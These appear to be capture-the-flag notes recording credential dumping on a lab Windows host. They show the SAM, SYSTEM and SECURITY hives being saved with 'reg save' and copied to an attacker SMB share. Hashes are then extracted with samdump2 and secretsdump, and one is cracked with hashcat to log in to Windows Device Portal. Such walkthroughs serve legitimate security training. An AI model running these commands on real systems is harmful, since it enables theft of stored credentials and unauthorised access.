4 dump SAM SYSTEM

c:\inetput\wwwwroot>fgdump.exe
This version of c:\inetput\wwwwroot\fgdump.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.

Using https://www.hackingarticles.in/credential-dumping-sam/

# tried PwDump7
# tried wce.exe

# trying SamDump2
c:\inetput\wwwwroot>reg save hklm\sam C:\inetput\wwwwroot\sam
reg save hklm\sam C:\inetput\wwwwroot\sam
The operation completed successfully.

c:\inetput\wwwwroot>reg save hklm\system C:\inetput\wwwwroot\system
reg save hklm\system C:\inetput\wwwwroot\system
The operation completed successfully

c:\inetput\wwwwroot>reg save hklm\security C:\inetput\wwwwroot\security
reg save hklm\security C:\inetput\wwwwroot\security
The operation completed successfully.

# moving files to kali
c:\inetput\wwwwroot>copy sam \\10.10.16.7\drive\
copy sam \\10.10.16.7\drive\
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
        0 file(s) copied.

# $ smbserver.py -smb2support drive .
c:\inetput\wwwwroot>copy sam \\10.10.16.7\drive\
copy sam \\10.10.16.7\drive\
        1 file(s) copied.

c:\inetput\wwwwroot>copy system \\10.10.16.7\drive\
copy system \\10.10.16.7\drive\
        1 file(s) copied.
		
c:\inetput\wwwwroot>copy security \\10.10.16.7\drive\
copy system \\10.10.16.7\drive\
        1 file(s) copied.

$ file sam system
sam:    MS Windows registry file, NT/2000 or above
system: MS Windows registry file, NT/2000 or above

$ samdump2 system sam
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

[OR]
$ secretsdump.py -sam sam -security security -system system LOCAL
Impacket v0.9.24.dev1+20210917.161743.0297480b - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
[*] Cleaning up...

# cracked app
e3cb0651718ee9b4faffe19a51faff95	NTLM	mesh5143

$ hashcat -m 1000 hash /usr/share/wordlists/rockyou.txt --show
31d6cfe0d16ae931b73c59d7e0c089c0:
e3cb0651718ee9b4faffe19a51faff95:mesh5143

# using app:mesh5143 we can log in to Windows Device Portal
http://10.10.10.204:8080/#Device%20Settings
| v.10.0.17763.107

Last updated